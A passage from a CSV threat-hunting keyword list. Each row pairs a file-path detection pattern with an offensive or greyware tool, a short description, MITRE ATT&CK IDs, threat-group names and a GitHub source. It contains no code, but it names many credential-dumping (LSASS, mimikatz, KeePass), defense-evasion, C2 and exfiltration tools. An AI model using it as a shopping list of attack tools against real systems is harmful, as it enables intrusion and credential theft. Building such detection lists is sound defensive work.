Tools,https://github.com/MzHmO/PowershellKerberos,1,0,N/A,9,3,262,37,2023-07-27T09:53:47Z,2023-04-22T19:16:52Z -*\injector.ps1 2 *,offensive_tool_keyword,PowershellKerberos,Some scripts to abuse kerberos using Powershell,T1558.003 - T1558.004 - T1059.001,TA0006 - TA0002,N/A,N/A,Exploitation Tools,https://github.com/MzHmO/PowershellKerberos,1,0,N/A,9,3,262,37,2023-07-27T09:53:47Z,2023-04-22T19:16:52Z -*\Inveigh.exe*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,0,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -*\inveigh.exe*,offensive_tool_keyword,SpaceRunner,enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.,T1059.001 - T1027,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Mr-B0b/SpaceRunner,1,0,N/A,7,2,185,38,2020-07-26T10:39:53Z,2020-07-26T09:31:09Z -*\Inveigh\bin\*,offensive_tool_keyword,Inveigh,.NET IPv4/IPv6 machine-in-the-middle tool for penetration testers,T1550.002 - T1059.001 - T1071.001,TA0002,N/A,N/A,Sniffing & Spoofing,https://github.com/Kevin-Robertson/Inveigh,1,0,N/A,10,10,2212,441,2023-06-13T01:36:42Z,2015-04-02T18:04:41Z -*\IPfuscation.cpp*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,1,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*\IPfuscation.exe*,offensive_tool_keyword,Shellcode-Hide,simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket),T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105,TA0005 - TA0001 - TA0003,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/Shellcode-Hide,1,0,N/A,9,3,296,75,2023-08-02T02:22:20Z,2023-02-05T17:31:43Z -*\ipscan-*-setup.exe*,greyware_tool_keyword,ipscan,Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/angryip/ipscan,1,0,N/A,7,10,3517,683,2023-09-11T16:36:25Z,2011-06-28T20:58:48Z -*\ipscan221.exe*,greyware_tool_keyword,ipscan,Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/angryip/ipscan,1,0,N/A,7,10,3517,683,2023-09-11T16:36:25Z,2011-06-28T20:58:48Z -*\ipscan-crash.txt*,greyware_tool_keyword,ipscan,Angry IP Scanner - fast and friendly network scanner - abused by a lot ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/angryip/ipscan,1,0,N/A,7,10,3517,683,2023-09-11T16:36:25Z,2011-06-28T20:58:48Z -*\irs.exe*,offensive_tool_keyword,impersonate-rs,Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI,T1134 - T1003 - T1008 - T1071,TA0004 - TA0006 - TA0011,N/A,N/A,Exploitation tools,https://github.com/zblurx/impersonate-rs,1,0,N/A,N/A,1,77,4,2023-06-15T15:33:49Z,2023-01-30T17:11:14Z -*\Ivy\Cryptor*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -*\Ivy\Loader\*,greyware_tool_keyword,ivy,Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory,T1059.005 - T1027 - T1055.005 - T1140,TA0002 - TA0005,N/A,N/A,Exploitation tools,https://github.com/optiv/Ivy,1,0,N/A,10,8,726,127,2023-08-18T17:30:14Z,2021-11-18T18:29:20Z -*\JuicyPotatoNG*,offensive_tool_keyword,JuicyPotatoNG,Another Windows Local Privilege Escalation from Service Account to System,T1055.002 - T1078.003 - T1070.004,TA0005 - TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/antonioCoco/JuicyPotatoNG,1,0,N/A,10,8,703,90,2022-11-12T01:48:39Z,2022-09-21T17:08:35Z -*\JunctionFolder.csproj*,offensive_tool_keyword,JunctionFolder,Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.,T1547.001 - T1574.001 - T1204.002,TA0005 - TA0004,N/A,N/A,Persistence - Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*\katz.ps1*,offensive_tool_keyword,mimikatz,mimikatz powershell alternative name,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Credential Access,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*\kdstab.exe*,offensive_tool_keyword,cobaltstrike,BOF combination of KillDefender and Backstab,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/Octoberfest7/KDStab,1,0,N/A,10,10,146,35,2023-03-23T02:22:50Z,2022-03-10T06:09:52Z -*\KeeTheft.exe*,offensive_tool_keyword,KeeThiefSyscalls,Patch GhostPack/KeeThief for it to use DInvoke and syscalls,T1003.001 - T1558.002,TA0006 - TA0005,N/A,N/A,Credential Access,https://github.com/Metro-Holografix/KeeThiefSyscalls,1,0,private github repo,10,,N/A,,, -*\kerberoast.c*,offensive_tool_keyword,nanorobeus,COFF file (BOF) for managing Kerberos tickets.,T1558.003 - T1208,TA0006 - TA0007,N/A,N/A,C2,https://github.com/wavvs/nanorobeus,1,0,N/A,10,10,234,28,2023-07-02T12:56:27Z,2022-07-04T00:33:30Z -*\KernelTokens.sys*,offensive_tool_keyword,Tokenvator,A tool to elevate privilege with Windows Tokens,T1134 - T1078,TA0003 - TA0004,N/A,N/A,Privilege Escalation,https://github.com/0xbadjuju/Tokenvator,1,0,N/A,N/A,10,968,208,2023-02-21T18:07:02Z,2017-12-08T01:29:11Z -*\keygen.exe*,greyware_tool_keyword,_,generic suspicious keyword keygen.exe observed in multiple cracked software often packed with malwares,T1204 - T1027 - T1059 - T1055 - T1060 - T1195,TA0005 - TA0002 - TA0011,N/A,N/A,Phishing,N/A,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\Keylogger.txt*,offensive_tool_keyword,EvilnoVNC,EvilnoVNC is a Ready to go Phishing Platform,T1566 - T1566.001 - T1071 - T1071.001,TA0043 - TA0001,N/A,N/A,Phishing,https://github.com/JoelGMSec/EvilnoVNC,1,0,N/A,9,7,662,118,2023-09-25T10:50:52Z,2022-09-04T10:48:49Z -*\KillDefender.c*,offensive_tool_keyword,KillDefenderBOF,KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender,T1055.002 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/Cerbersec/KillDefenderBOF,1,0,N/A,10,3,200,29,2022-04-12T17:45:50Z,2022-02-06T21:59:03Z -*\KillDefender.o*,offensive_tool_keyword,KillDefenderBOF,KillDefenderBOF is a Beacon Object File PoC implementation of pwn1sher/KillDefender - kill defender,T1055.002 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/Cerbersec/KillDefenderBOF,1,0,N/A,10,3,200,29,2022-04-12T17:45:50Z,2022-02-06T21:59:03Z -*\kitten.exe*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,0,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*\KittyStager*,offensive_tool_keyword,KittyStager,KittyStager is a simple stage 0 C2. It is made of a web server to host the shellcode and an implant called kitten. The purpose of this project is to be able to have a web server and some kitten and be able to use the with any shellcode.,T1021.002 - T1055.012 - T1105,TA0005 - TA0008 - TA0011,N/A,N/A,C2,https://github.com/Enelg52/KittyStager,1,0,N/A,10,10,175,34,2023-06-06T11:38:39Z,2022-10-10T11:31:23Z -*\Koh.exe*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,0,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -*\Koh.pdb*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,0,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -*\Koh\Koh.*,offensive_tool_keyword,cobaltstrike,Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/GhostPack/Koh,1,0,N/A,10,10,447,59,2022-07-13T23:41:38Z,2022-07-07T17:14:09Z -*\krb5\*.py,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*\KRBUACBypass*,offensive_tool_keyword,KRBUACBypass,UAC Bypass By Abusing Kerberos Tickets,T1548.002 - T1558 - T1558.003,TA0004 - TA0006,N/A,N/A,Defense Evasion,https://github.com/wh0amitz/KRBUACBypass,1,0,N/A,8,5,402,52,2023-08-10T02:51:59Z,2023-07-27T12:08:12Z -*\Ladon.exe*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*\Ladon.ps1*,offensive_tool_keyword,cobaltstrike,Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/k8gege/Ladon,1,0,N/A,10,10,4238,827,2023-09-11T14:47:26Z,2019-11-02T06:22:41Z -*\lansearch.exe*,greyware_tool_keyword,advanced port scanner,port scanner tool abused by ransomware actors,T1046 - T1040 - T1018,TA0007 - TA0009,N/A,N/A,Network Exploitation tools,https://www.advanced-port-scanner.com/,1,0,N/A,7,10,N/A,N/A,N/A,N/A -*\LAPSDumper\*,offensive_tool_keyword,LAPSDumper,Dumping LAPS from Python,T1136.001 - T1112 - T1078.001,TA0002 - TA0004 - TA0005,N/A,N/A,Credential Access,https://github.com/n00py/LAPSDumper,1,0,N/A,10,3,222,34,2022-12-07T18:35:28Z,2020-12-19T05:15:10Z -*\ldap_search_bof.py*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,0,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*\LibSnaffle*,offensive_tool_keyword,Group3r,Find vulnerabilities in AD Group Policy,T1484.002 - T1069.002 - T1087.002,TA0007 - TA0040,N/A,N/A,AD Enumeration,https://github.com/Group3r/Group3r,1,0,N/A,N/A,5,488,47,2023-08-07T16:45:14Z,2021-07-05T05:05:42Z -*\Loader\Loader.csproj*,offensive_tool_keyword,NixImports,A .NET malware loader using API-Hashing to evade static analysis,T1055.012 - T1562.001 - T1140,TA0005 - TA0003 - TA0040,N/A,N/A,Defense Evasion - Execution,https://github.com/dr4k0nia/NixImports,1,1,N/A,N/A,2,178,23,2023-05-30T14:14:21Z,2023-05-22T18:32:01Z -*\local_admins.csv*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*\LocalPrivEsc\*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,0,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*\LogonScreen.exe*,offensive_tool_keyword,cobaltstrike,Erebus CobaltStrike post penetration testing plugin,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DeEpinGh0st/Erebus,1,1,N/A,10,10,1356,214,2021-10-28T06:20:51Z,2019-09-26T09:32:00Z -*\lsass.DMP,offensive_tool_keyword,pypykatz,Mimikatz implementation in pure Python,T1003.002 - T1055 - T1078,TA0003 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/skelsec/pypykatz,1,0,N/A,N/A,10,2471,369,2023-05-30T16:14:22Z,2018-05-25T22:21:20Z -*\lsass.dmp*,offensive_tool_keyword,cobaltstrike,Collection of beacon object files for use with Cobalt Strike to facilitate,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rookuu/BOFs,1,1,N/A,10,10,156,26,2021-02-11T10:48:12Z,2021-02-11T10:28:48Z -*\lsass.dmp*,offensive_tool_keyword,POSTDump,perform minidump of LSASS process using few technics to avoid detection.,T1003.001 - T1055 - T1564.001,TA0005 - TA0006,N/A,N/A,Credential Access,https://github.com/YOLOP0wn/POSTDump,1,0,N/A,10,2,172,21,2023-09-15T11:24:50Z,2023-09-13T11:28:51Z -*\LSASSProtectionBypass\*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,0,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z -*\LsassSilentProcessExit*,offensive_tool_keyword,LsassSilentProcessExit,Command line interface to dump LSASS memory to disk via SilentProcessExit,T1003.001 - T1059.003,TA0006 - TA0002,N/A,N/A,Credential Access,https://github.com/deepinstinct/LsassSilentProcessExit,1,0,N/A,10,5,421,64,2020-12-23T11:51:21Z,2020-11-29T08:49:42Z -*\m3-gen.py*,offensive_tool_keyword,MaliciousMacroMSBuild,Generates Malicious Macro and Execute Powershell or Shellcode via MSBuild Application Whitelisting Bypass.,T1059.001 - T1059.003 - T1127 - T1027.002,TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/infosecn1nja/MaliciousMacroMSBuild,1,0,N/A,8,5,488,117,2019-08-06T08:16:05Z,2018-04-09T23:16:30Z -*\MaccaroniC2*,offensive_tool_keyword,MaccaroniC2,A proof-of-concept Command & Control framework that utilizes the powerful AsyncSSH Python library which provides an asynchronous client and server implementation of the SSHv2 protocol and use PyNgrok wrapper for ngrok integration.,T1090 - T1059.003,TA0011 - TA0002,N/A,N/A,C2,https://github.com/CalfCrusher/MaccaroniC2,1,0,N/A,10,10,57,9,2023-06-27T17:43:59Z,2023-05-21T13:33:48Z -*\macoffe.pdb*,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*\malseclogon.*,offensive_tool_keyword,nanodump,The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.,T1003.001 - T1003.003,TA0006,N/A,N/A,Credential Access,https://github.com/fortra/nanodump,1,0,N/A,N/A,10,1467,208,2023-09-04T01:25:27Z,2021-11-10T18:28:15Z -*\MalStuff.cpp*,offensive_tool_keyword,D1rkInject,Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state,T1055 - T1055.012 - T1055.002 - T1574.002,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/D1rkInject,1,0,N/A,9,2,129,24,2023-08-02T02:45:46Z,2023-08-02T02:13:55Z -*\malware_runner.py*,offensive_tool_keyword,power-pwn,An offensive and defensive security toolset for Microsoft 365 Power Platform,T1078 - T1078.004 - T1136 - T1136.001 - T1021 - T1021.003 - T1114 - T1114.002,TA0003 - TA0004 - TA0005 - TA0001,N/A,N/A,Exploitation tools,https://github.com/mbrg/power-pwn,1,0,N/A,10,4,360,34,2023-09-12T12:44:44Z,2022-06-14T11:40:21Z -*\manspider_*.log*,offensive_tool_keyword,MANSPIDER,Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!,T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083,TA0007 - TA0009 - TA0010,N/A,N/A,Discovery,https://github.com/blacklanternsecurity/MANSPIDER,1,0,N/A,8,8,772,119,2023-10-03T03:50:49Z,2020-03-18T13:27:20Z -*\master\GPSCoordinates\*,offensive_tool_keyword,GPSCoordinates,Tracks the system's GPS coordinates (accurate within 1km currently) if Location Services are enabled,T1018 - T1059.001,TA0001 - TA0002,N/A,N/A,Reconnaissance,https://github.com/matterpreter/OffensiveCSharp/tree/master/GPSCoordinates,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*\Mayhem.psm1*,offensive_tool_keyword,PowerSploit,PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts,T1059 - T1053 - T1003 - T1114 - T1204,TA0002 - TA0008 - TA0011,N/A,N/A,Frameworks,https://github.com/PowerShellMafia/PowerSploit,1,0,N/A,10,10,10978,4550,2020-08-17T23:19:49Z,2012-05-26T16:08:48Z -*\megatools-*-win64\*,greyware_tool_keyword,megatools,Megatools is a collection of free and open source programs for accessing Mega service from a command line. Abused by attackers for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data 